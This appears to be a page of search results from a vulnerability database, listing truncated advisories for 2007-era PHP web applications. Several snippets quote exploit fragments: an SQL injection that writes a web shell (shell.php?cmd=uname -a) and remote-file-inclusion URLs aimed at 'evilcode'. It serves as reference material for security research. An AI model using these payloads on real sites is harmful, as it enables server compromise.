647 matches found
CVE-2007-3530
PHPDirector 0.21 and earlier stores the admin account name and password in config.php, which allows local users to gain privileges by reading this file...
Design/Logic Flaw
PHPDirector 0.21 and earlier stores the admin account name and password in config.php, which allows local users to gain privileges by reading this file...
CVE-2007-3530
CVE-2007-3530 affects PHPDirector 0.21 and earlier. The admin account name and password are stored in config.php, which allows local users to gain privileges by reading that file. The vulnerability is a local privilege escalation due to insecure storage of credentials. The available sources confi...
PHPDirector 0.21 - videos.php?id SQL Injection
PHPDirector 0.21 - videos.php?id SQL Injection PHPDirector ',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'pathfounded/shell.php'%20FROM%20ppconfig 3. http://www.site.com/shell.php?cmd=uname -a GREETZ: all memberz of RST and milw0rm //kw3rln http://rstzone.net milw0rm.com 200...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in myBloggie 2.1.5 allow remote attackers to execute arbitrary PHP code via a URL in the bloggierootpath parameter to (1) config.php; (2) db.php, (3) template.php, (4) functions.php, and (5) classes.php in includes/; (6) viewmode.php; and (7) blogbody.php. NOT...
mybloggie-rfi.txt
myBloggie 2.1.5 RFI Author: Yaser Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode? http://site/includes/template.php?bloggierootpath=evilcode?...
Code injection
Direct static code injection vulnerability in admin_config.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action...
CVE-2007-2899
The CVE-2007-2899 entry affects NavBoard 2.6.0, with the vulnerability in admin_config.php allowing direct static code injection to data/config.php via multiple parameters (demonstrated via threadperpage in editconfig). Root cause: insecure handling of input leading to PHP code injection. Impact,...
CVE-2007-2899
Direct static code injection vulnerability in admin_config.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in FireFly 1.1.01 allow remote attackers to execute arbitrary PHP code via a URL in the doc_root parameter to (1) localize.php or (2) config.php in modules/admin/include/...
Code injection
admin/config.php in the music-on-hold module in freePBX 2.2.x allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the del parameter...
sunshop v4 >> RFI
vendor : turnkeywebtools.com by : s3rv3rhack3r [email protected] bugz: ++++++++++++++++++++ include/payment/payflowpro.php include $abspath."/include/payment/payflowpro/pfpro.class.php"; ++++++++++++++++++++ global.php require_once $abspath."/libsecure.php"; ++++++++++++++++++++ libsecure.php inclu...
Remote file inclusion
PHP remote file inclusion vulnerability in config.php in Built2Go PHP Link Portal 1.79 allows remote attackers to execute arbitrary PHP code via a URL in the fullpathtodb parameter...
Firefly 1.1.01 - doc_root Remote File Inclusion
Firefly 1.1.01 - doc_root Remote File Inclusion firefly 1.1.01 = Remote File Include Vulnerability D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com...
JulmaCMS 1.4 - 'file.php' Remote File Disclosure
JulmaCMS 1.4file.php fileRemote File Disclosure D.Script: http://julmajanne.com/downloads/julma.zip Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc V.Code In /file.php: /file.php dir . $file; $fname = basename$file; $mime = mimetype"mime", $fname; header"Content-Type: $mime";...
JulmaCMS 1.4 - file.php Remote File Disclosure
JulmaCMS 1.4 - file.php Remote File Disclosure JulmaCMS 1.4file.php fileRemote File Disclosure D.Script: http://julmajanne.com/downloads/julma.zip Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc V.Code In /file.php: /file.php dir . $file; $fname = basename$file; $mime =...
postrev-rfi.txt
Post Revolution Remote File Inclusion Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2 Download..: http://www.fabio.com.ar/postrev/ Risk ..............: high Date .........: 25/3/2007 Found by ..........: InyeXion Contact ...........: InyeXionatgmail.com Web .............:...
Code injection
Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action...
CVE-2007-2167
The CVE-2007-2167 issue affects AimStats 3.2 and is caused by a vulnerability in process.php where the number parameter in an update action allows remote attackers to inject PHP code into config.php. This is a static code injection scenario that could enable arbitrary code execution in the PHP en...